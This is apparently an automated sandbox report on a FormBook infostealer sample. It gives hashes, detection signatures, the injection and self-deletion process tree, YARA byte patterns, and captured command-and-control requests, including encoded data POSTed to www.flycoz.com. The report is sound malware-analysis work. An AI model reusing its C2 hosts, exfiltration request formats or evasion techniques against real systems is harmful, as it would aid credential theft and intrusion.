
Analysis Report druS9vVaUK.exe

Overview

General Information

Sample Name: druS9vVaUK.exe
MD5: e2a5e6e8c1448dfcaf7ae95dff95ade9
SHA1: 33c1ff8589faf0c2469a33131fcdffb01547dab0
SHA256: 8e0003e4f6d537153e60ac5129859a33b57b3b9a36b7d2be62273a6b3a8d5f3f

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • druS9vVaUK.exe (PID: 1320 cmdline: 'C:\Users\user\Desktop\druS9vVaUK.exe' MD5: E2A5E6E8C1448DFCAF7AE95DFF95ADE9)
    • druS9vVaUK.exe (PID: 3876 cmdline: {path} MD5: E2A5E6E8C1448DFCAF7AE95DFF95ADE9)
      • explorer.exe (PID: 3024 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
        • NETSTAT.EXE (PID: 4988 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 476 cmdline: /c del 'C:\Users\user\Desktop\druS9vVaUK.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • axh0nv7nt03do.exe (PID: 1200 cmdline: 'C:\Program Files (x86)\Ttrexqpt\axh0nv7nt03do.exe' MD5: E2A5E6E8C1448DFCAF7AE95DFF95ADE9)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x157b9:$sqlite3step: 68 34 1C 7B E1
    • 0x158cc:$sqlite3step: 68 34 1C 7B E1
    • 0x157e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1590d:$sqlite3text: 68 38 2A 90 C5
    • 0x157fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x15923:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x7248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x74b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x12b35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x12621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x12c37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x12daf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x802a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1189c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x89c3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x17ea7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x18eaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0x157b9:$sqlite3step: 68 34 1C 7B E1
      • 0x158cc:$sqlite3step: 68 34 1C 7B E1
      • 0x157e8:$sqlite3text: 68 38 2A 90 C5
      • 0x1590d:$sqlite3text: 68 38 2A 90 C5
      • 0x157fb:$sqlite3blob: 68 53 D8 7F 8C
      • 0x15923:$sqlite3blob: 68 53 D8 7F 8C

Unpacked PEs

Source | Rule | Description | Author | Strings
2.2.druS9vVaUK.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.druS9vVaUK.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x149b9:$sqlite3step: 68 34 1C 7B E1
        • 0x14acc:$sqlite3step: 68 34 1C 7B E1
        • 0x149e8:$sqlite3text: 68 38 2A 90 C5
        • 0x14b0d:$sqlite3text: 68 38 2A 90 C5
        • 0x149fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x14b23:$sqlite3blob: 68 53 D8 7F 8C
2.2.druS9vVaUK.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x6448:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x66b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x11d35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x11821:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x11e37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x11faf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x722a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x10a9c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x7bc3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x170a7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x180aa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.druS9vVaUK.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.druS9vVaUK.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          • 0x157b9:$sqlite3step: 68 34 1C 7B E1
          • 0x158cc:$sqlite3step: 68 34 1C 7B E1
          • 0x157e8:$sqlite3text: 68 38 2A 90 C5
          • 0x1590d:$sqlite3text: 68 38 2A 90 C5
          • 0x157fb:$sqlite3blob: 68 53 D8 7F 8C
          • 0x15923:$sqlite3blob: 68 53 D8 7F 8C

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for domain / URL
Source: www.flycoz.com, Virustotal: Detection: 8%
Source: http://www.flycoz.com/te/, Virustotal: Detection: 9%
Source: http://www.flycoz.com, Virustotal: Detection: 8%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Ttrexqpt\axh0nv7nt03do.exe, Virustotal: Detection: 33%
Source: C:\Users\user\AppData\Local\Temp\Ttrexqpt\axh0nv7nt03do.exe, ReversingLabs: Detection: 35%
Multi AV Scanner detection for submitted file
Source: druS9vVaUK.exe, Virustotal: Detection: 33%
Source: druS9vVaUK.exe, ReversingLabs: Detection: 35%
Yara detected FormBook
Source: Yara match, File source: 00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.501038766.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.852694551.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.499850983.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.453585348.0000000009125000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 2.2.druS9vVaUK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.druS9vVaUK.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Ttrexqpt\axh0nv7nt03do.exe, Joe Sandbox ML: detected
Machine Learning detection for sample
Source: druS9vVaUK.exe, Joe Sandbox ML: detected
Source: 2.2.druS9vVaUK.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Users\user\Desktop\druS9vVaUK.exe, Code function: 4x nop then pop edi, 2_2_00415092
Source: C:\Users\user\Desktop\druS9vVaUK.exe, Code function: 4x nop then pop ebx, 2_2_004053FD
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop ebx, 5_2_032A53FD
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop edi, 5_2_032B5092
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop edi, 5_2_032B40D2

Networking:

Uses netstat to query active network connections and open ports
Source: unknown, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: global traffic, HTTP traffic detected:
  GET /te/?1bm41T=mVrXCCC1UxiLkFcyo0UiEujr6Tcj2iygFeKfTYkHGEjYfWW5ml4nmy0cK0afZAsSueXT&U2M=LHELWH HTTP/1.1
  Host: www.isolb.net
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic, HTTP traffic detected:
  GET /te/?1bm41T=M2ouDOe6+0eFywnoUebsisyNcixzNrb8Dit4zcLuso93p7KAZYRDmlVUuNOu64F6TRgF&U2M=LHELWH HTTP/1.1
  Host: www.flycoz.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: Joe Sandbox View, IP Address: 209.99.64.55
Source: Joe Sandbox View, ASN Name: unknown
          Source: global trafficHTTP traffic detected: POST /te/ HTTP/1.1Host: www.flycoz.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.flycoz.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.flycoz.com/te/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 31 62 6d 34 31 54 3d 45 55 6b 55 64 72 6a 4d 30 67 37 6d 79 77 61 4a 56 34 33 71 32 64 36 6a 59 52 68 52 59 4a 62 36 58 53 34 45 6a 4d 69 77 6a 4b 78 53 74 70 4f 35 51 72 4d 4d 6a 46 51 47 78 63 43 73 67 49 49 72 4f 78 59 65 47 6b 39 39 38 4a 37 49 64 72 70 39 56 51 52 4a 7a 63 50 70 45 5f 49 31 57 4c 44 39 4a 6b 51 36 79 52 61 35 47 44 28 6f 37 45 73 31 57 34 4e 33 4c 30 58 39 53 73 49 74 6b 4c 69 32 4c 71 36 6e 6c 76 6f 32 7e 63 53 54 62 75 58 2d 47 58 34 76 6b 48 31 34 38 4d 39 4c 6a 4b 4f 69 67 31 28 6d 47 4f 77 49 65 30 35 6e 59 36 77 64 6f 6a 61 66 73 70 78 6f 6d 75 71 51 7a 48 55 52 4b 77 4e 46 7a 5a 34 44 57 4f 53 56 47 4a 74 35 70 4e 34 51 57 49 6e 34 4a 4d 7e 38 6f 78 44 53 36 4a 47 33 53 6d 6e 62 49 52 7a 47 51 49 36 67 59 67 73 6b 61 5a 4e 59 6f 46 72 47 74 47 41 49 4e 4c 64 61 30 6d 64 4d 4c 4f 50 58 42 48 39 6e 46 58 6d 2d 47 46 70 62 42 6f 7a 72 62 44 53 31 51 78 41 2d 70 78 42 38 52 79 52 6c 7a 41 4e 66 70 78 28 35 37 6f 4c 50 30 47 69 6f 7e 36 36 6e 6f 67 70 42 62 61 31 34 62 75 28 4e 31 34 54 70 6d 33 78 6b 62 65 51 63 61 71 48 30 34 39 64 43 38 63 35 37 59 70 36 78 6d 53 65 61 53 32 62 75 6f 30 6f 66 34 6e 54 56 4f 76 73 64 4f 55 43 48 73 6a 76 6a 6f 58 44 70 73 34 6c 35 78 41 78 59 6c 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
1bm41T=EUkUdrjM0g7mywaJV43q2d6jYRhRYJb6XS4EjMiwjKxStpO5QrMMjFQGxcCsgIIrOxYeGk998J7Idrp9VQRJzcPpE_I1WLD9JkQ6yRa5GD(o7Es1W4N3L0X9SsItkLi2Lq6nlvo2~cSTbuX-GX4vkH148M9LjKOig1(mGOwIe05nY6wdojafspxomuqQzHURKwNFzZ4DWOSVGJt5pN4QWIn4JM~8oxDS6JG3SmnbIRzGQI6gYgskaZNYoFrGtGAINLda0mdMLOPXBH9nFXm-GFpbBozrbDS1QxA-pxB8RyRlzANfpx(57oLP0Gio~66nogpBba14bu(N14Tpm3xkbeQcaqH049dC8c57Yp6xmSeaS2buo0of4nTVOvsdOUCHsjvjoXDps4l5xAxYlg).
          Source: global trafficHTTP traffic detected: POST /te/ HTTP/1.1Host: www.flycoz.comConnection: closeContent-Length: 146192Cache-Control: no-cacheOrigin: http://www.flycoz.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.flycoz.com/te/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 31 62 6d 34 31 54 3d 45 55 6b 55 64 70 43 39 31 51 28 33 6a 7a 7a 76 48 4f 57 6e 39 59 7e 74 64 53 31 43 43 71 37 75 65 6c 67 71 6a 4d 54 33 72 72 68 41 6e 71 57 35 57 70 6b 58 71 46 51 46 35 38 43 7a 32 4a 31 65 51 57 4d 47 47 6c 34 31 38 4a 7a 4a 58 4e 6c 30 56 41 52 61 7a 38 44 46 43 38 30 75 57 4a 32 66 48 6d 38 69 33 52 57 35 59 6e 54 71 69 46 38 51 54 39 39 79 56 55 37 79 42 63 67 77 6b 35 32 4f 4b 4e 6d 46 31 2d 30 34 76 64 6d 49 48 2d 6d 5a 44 45 59 61 71 7a 6c 37 35 50 42 69 6e 74 66 70 6a 30 28 75 4b 76 77 50 65 45 67 6d 55 61 42 2d 74 51 57 6d 75 35 67 52 6d 6f 50 6c 37 57 70 49 42 52 64 64 31 6f 30 70 59 66 57 58 4b 61 30 38 7e 37 45 44 46 59 33 48 52 4f 58 75 73 69 47 50 30 73 44 71 50 55 48 67 4b 46 44 4b 66 71 79 32 5a 54 41 53 41 38 46 6e 6b 6d 36 41 6c 33 67 36 49 4a 77 35 35 6d 63 71 62 2d 50 4c 56 69 70 50 41 42 65 70 47 47 68 6d 42 75 57 7a 44 79 75 6c 65 55 41 51 32 41 73 36 58 57 45 71 35 69 35 6e 74 7a 50 49 71 76 36 77 69 32 69 50 30 59 53 6f 6f 67 70 4e 62 62 31 53 55 5f 37 4e 31 74 66 32 6e 55 4a 53 50 75 51 37 4a 4b 58 32 71 4f 5a 73 38 63 68 37 62 34 4b 58 6d 68 4f 61 57 6b 7a 68 70 52 45 66 28 58 54 56 58 5f 74 6a 64 56 54 35 73 57 62 78 71 31 6a 6d 77 49 6c 71 34 41 34 6b 79 65 6a 66 43 56 43 78 78 31 62 4e 6d 31 42 7a 52 59 30 4d 4c 55 37 45 42 61 70 65 4c 4c 57 42 67 67 63 7a 6e 4d 78 43 78 76 57 59 79 68 6c 74 41 6c 62 50 44 38 56 77 6b 6f 6e 56 51 69 37 6e 68 42 55 4d 4d 2d 33 56 53 2d 41 4e 68 64 65 53 30 53 55 79 6d 61 71 61 35 30 74 79 65 66 35 7a 46 6e 42 48 56 73 68 45 6a 57 31 51 6f 68 6c 75 7a 59 5a 59 33 71 
6c 67 67 51 36 35 63 4b 79 64 4a 58 34 37 61 72 58 41 73 2d 6d 38 28 33 31 42 78 43 30 74 35 34 6a 6c 31 56 34 33 34 7a 4b 39 56 78 34 65 55 68 5a 52 6d 4d 64 61 67 6c 4b 49 47 56 6f 5f 33 64 47 4c 42 75 66 51 67 49 63 72 45 44 42 38 44 68 6e 63 4f 59 67 67 44 4c 4d 73 4f 36 78 37 5a 33 76 6e 6c 4b 56 4f 34 49 54 52 71 38 6a 74 34 30 57 68 43 69 74 41 36 6b 46 50 59 5a 4f 2d 64 32 49 36 39 6f 46 65 37 4d 77 67 46 37 4c 4d 42 74 53 4a 62 65 4f 37 45 6d 41 38 28 64 28 68 63 5f 4c 4d 6c 77 34 45 32 63 63 6c 4c 33 66 41 50 44 39 66 77 62 6c 62 56 58 31 51 4b 58 76 5a 6a 47 76 4f 7e 79 72 32 66 35 6e 48 43 5f 39 73 33 6c 71 44 39 66 6e 42 49 45 4b 78 70 36 6c 32 31 6e 50 73 48 6c 39 78 70 73 28 41 6f 6b 61 6f 66 54 6c 36 61 32 7e 30 7a 72 70 63 71 4a 50 41 42 55 33 44 4f 52 6e 73 58 39 65 6a 76 54 62 76 44 55 67 6c 45 34 6e 72 6e 31 48 72 4c 74 75 61 56 57 36 4e 77 78 66 71 47 52 28 4d 68 4e 66 57 35 78 67 6c 4a 53 72 77 7e 4e 39 78 38 35 28 6a 54 58 66 46 41 45 52 43 42 75 65 58 6e 50 35 64 51 77 6a 41 77 39 6e 36 4c 32
Source: unknown, DNS traffic detected: queries for: www.qdbfqfphjidqgtbttnq.com
          Source: unknownHTTP traffic detected: POST /te/ HTTP/1.1Host: www.flycoz.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.flycoz.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.flycoz.com/te/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 31 62 6d 34 31 54 3d 45 55 6b 55 64 72 6a 4d 30 67 37 6d 79 77 61 4a 56 34 33 71 32 64 36 6a 59 52 68 52 59 4a 62 36 58 53 34 45 6a 4d 69 77 6a 4b 78 53 74 70 4f 35 51 72 4d 4d 6a 46 51 47 78 63 43 73 67 49 49 72 4f 78 59 65 47 6b 39 39 38 4a 37 49 64 72 70 39 56 51 52 4a 7a 63 50 70 45 5f 49 31 57 4c 44 39 4a 6b 51 36 79 52 61 35 47 44 28 6f 37 45 73 31 57 34 4e 33 4c 30 58 39 53 73 49 74 6b 4c 69 32 4c 71 36 6e 6c 76 6f 32 7e 63 53 54 62 75 58 2d 47 58 34 76 6b 48 31 34 38 4d 39 4c 6a 4b 4f 69 67 31 28 6d 47 4f 77 49 65 30 35 6e 59 36 77 64 6f 6a 61 66 73 70 78 6f 6d 75 71 51 7a 48 55 52 4b 77 4e 46 7a 5a 34 44 57 4f 53 56 47 4a 74 35 70 4e 34 51 57 49 6e 34 4a 4d 7e 38 6f 78 44 53 36 4a 47 33 53 6d 6e 62 49 52 7a 47 51 49 36 67 59 67 73 6b 61 5a 4e 59 6f 46 72 47 74 47 41 49 4e 4c 64 61 30 6d 64 4d 4c 4f 50 58 42 48 39 6e 46 58 6d 2d 47 46 70 62 42 6f 7a 72 62 44 53 31 51 78 41 2d 70 78 42 38 52 79 52 6c 7a 41 4e 66 70 78 28 35 37 6f 4c 50 30 47 69 6f 7e 36 36 6e 6f 67 70 42 62 61 31 34 62 75 28 4e 31 34 54 70 6d 33 78 6b 62 65 51 63 61 71 48 30 34 39 64 43 38 63 35 37 59 70 36 78 6d 53 65 61 53 32 62 75 6f 30 6f 66 34 6e 54 56 4f 76 73 64 4f 55 43 48 73 6a 76 6a 6f 58 44 70 73 34 6c 35 78 41 78 59 6c 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
1bm41T=EUkUdrjM0g7mywaJV43q2d6jYRhRYJb6XS4EjMiwjKxStpO5QrMMjFQGxcCsgIIrOxYeGk998J7Idrp9VQRJzcPpE_I1WLD9JkQ6yRa5GD(o7Es1W4N3L0X9SsItkLi2Lq6nlvo2~cSTbuX-GX4vkH148M9LjKOig1(mGOwIe05nY6wdojafspxomuqQzHURKwNFzZ4DWOSVGJt5pN4QWIn4JM~8oxDS6JG3SmnbIRzGQI6gYgskaZNYoFrGtGAINLda0mdMLOPXBH9nFXm-GFpbBozrbDS1QxA-pxB8RyRlzANfpx(57oLP0Gio~66nogpBba14bu(N14Tpm3xkbeQcaqH049dC8c57Yp6xmSeaS2buo0of4nTVOvsdOUCHsjvjoXDps4l5xAxYlg).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Jun 2020 16:04:43 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 326Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 65 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /te/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: druS9vVaUK.exe, 00000000.00000003.423050630.000000000101C000.00000004.00000001.sdmp, String found in binary or memory: http://en.wikipF
Source: druS9vVaUK.exe, 00000000.00000002.448671243.0000000005372000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/logo.png)
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/search-icon.png)
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/arrow.png)
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg)
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/libgh.png)
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.2
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/bodybg.png)
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/libg.png)
Source: explorer.exe, 00000003.00000000.457087223.00000000034B0000.00000004.00000001.sdmp, String found in binary or memory: http://ns.ado
Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmp, String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eas/sc/2b/a5ea21.ico
Source: NETSTAT.EXE, 00000005.00000003.770046562.0000000000247000.00000004.00000001.sdmp, String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eas/sc/2b/a5ea21.ico11d
Source: explorer.exe, 00000003.00000002.853654083.00000000033D0000.00000002.00000001.sdmp, String found in binary or memory: http://www.%s.comPA
Source: druS9vVaUK.exe, 00000000.00000002.448671243.0000000005372000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.477127309.0000000007D97000.00000004.00000001.sdmp, String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: druS9vVaUK.exe, 00000000.00000003.433122078.0000000005163000.00000004.00000001.sdmp, String found in binary or memory: http://www.carterandcone.comght?P
Source: druS9vVaUK.exe, 00000000.00000002.448671243.0000000005372000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
